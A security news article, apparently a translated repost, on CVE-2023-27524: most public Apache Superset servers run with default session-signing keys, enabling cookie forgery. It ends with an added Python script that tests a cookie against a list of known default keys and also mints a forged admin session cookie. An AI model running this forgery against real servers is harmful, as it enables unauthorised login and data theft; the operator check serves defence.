67% of public Apache Superset servers use the secret key from the sample configuration

Researchers at Horizon3 have drawn attention to a security problem in most deployments of Apache Superset, the data analysis and visualization platform. On 2124 of the 3176 publicly reachable Apache Superset servers they examined, the instance was running with the default secret key taken from the sample configuration file. Superset hands this key to the Flask Python framework, which uses it to sign session cookies. An attacker who knows the key can therefore forge a session cookie for any user, log in to the Apache Superset web interface, read data from the connected databases, or arrange code execution with the privileges of the Apache Superset process.

Notably, the researchers first reported the problem to the developers in 2021. In response, the Apache Superset 1.4.1 release, published in January 2022, replaced the SECRET_KEY value with the string "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET" and added a check that writes a warning to the log when this value is in use.

In February of this year the researchers repeated their scan for vulnerable systems and found that few operators had acted on the warning: 67% of the Apache Superset servers were still using a key taken from a sample configuration, a deployment template or the documentation. Among the organizations running such insecure keys were several large companies, universities and government agencies.

Shipping a working key in the sample configuration is now treated as a vulnerability (CVE-2023-27524). It was fixed in Apache Superset 2.1, which refuses to start and raises an error when the key from the sample configuration is in use. The check covers only the key found in the current release's sample configuration; older default keys and keys copied from deployment templates and documentation are not blocked. The researchers have also published a script that checks a Superset instance over the network for the presence of the vulnerability.
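The cookie forgery described above comes down to Flask's session signing being an HMAC keyed from SECRET_KEY, so any party holding the key can both verify and mint cookies. The following added example, written for this page and not code from Horizon3 or the Superset project, re-implements the subset of itsdangerous that Flask's session interface uses (URLSafeTimedSerializer with salt "cookie-session" and HMAC-SHA1) in the standard library, then uses it two ways: to test a captured cookie against a list of default keys (the operator's check), and to build a cookie for a chosen user when a key matches (the attack). The list is seeded with the key named in this article; the other entries are default keys I recall from Horizon3's disclosure and are an assumption here, as is the Flask-Login session layout (`_user_id`, `_fresh`) used for the forged payload.

```python
"""Check a Flask/Apache Superset session cookie against known default
SECRET_KEY values, and build a forged cookie when one matches.

Stdlib re-implementation of what Flask's SecureCookieSessionInterface does
through itsdangerous: URLSafeTimedSerializer, salt b"cookie-session",
key_derivation="hmac", digest SHA-1. Added example, not project code.
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"  # Flask's fixed salt for session cookies

# First entry is the key named in the article. The rest are the other
# defaults from the Horizon3 disclosure as I remember them (assumption);
# the logic below works with any candidate list.
DEFAULT_SECRET_KEYS = [
    "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",
    "\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h",
    "thisISaSECRET_1234",
    "YOUR_OWN_RANDOM_GENERATED_SECRET_KEY",
]


def _b64e(raw: bytes) -> bytes:
    # itsdangerous base64: URL-safe alphabet, padding stripped
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret_key: str) -> bytes:
    # key_derivation="hmac": signing key = HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def _signature(secret_key: str, value: bytes) -> bytes:
    return _b64e(hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest())


def sign_session(data: dict, secret_key: str, timestamp: Optional[int] = None) -> str:
    """Build a session cookie the way Flask would for the dict `data`."""
    payload = json.dumps(data, separators=(",", ":")).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:   # itsdangerous compression rule
        body = b"." + _b64e(compressed)
    else:
        body = _b64e(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    value = body + b"." + _b64e(ts_bytes)
    return (value + b"." + _signature(secret_key, value)).decode()


def verify_session(cookie: str, secret_key: str) -> Optional[dict]:
    """Return the session payload if `cookie` is signed with `secret_key`, else None."""
    try:
        value, sig = cookie.encode().rsplit(b".", 1)
        if not hmac.compare_digest(sig, _signature(secret_key, value)):
            return None
        body, _timestamp = value.rsplit(b".", 1)
        raw = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
        return json.loads(raw)
    except (ValueError, zlib.error):
        return None


def find_default_key(cookie: str, candidates=DEFAULT_SECRET_KEYS) -> Optional[str]:
    """Operator check: which default key, if any, validates this cookie?"""
    for key in candidates:
        if verify_session(cookie, key) is not None:
            return key
    return None


def forge_user_cookie(user_id: int, secret_key: str) -> str:
    """Attacker step: mint a Flask-Login session for `user_id` (layout assumed)."""
    return sign_session({"_user_id": str(user_id), "_fresh": True}, secret_key)


if __name__ == "__main__":
    # Constructed cookie standing in for one captured from a vulnerable server.
    captured = sign_session({"_user_id": "5"}, "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET")
    key = find_default_key(captured)
    print("default key in use:", repr(key))
    if key:
        print("forged admin session:", forge_user_cookie(1, key))
```

Paste the value of your own instance's `session` cookie into `find_default_key`; any result other than `None` means the key must be rotated (which invalidates all existing sessions). Flask rejects cookies whose timestamp is older than PERMANENT_SESSION_LIFETIME, which is why `sign_session` stamps the current time; the verifier here deliberately ignores age, since an operator checking an old capture still wants to know the key matched.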

source: budenet.ru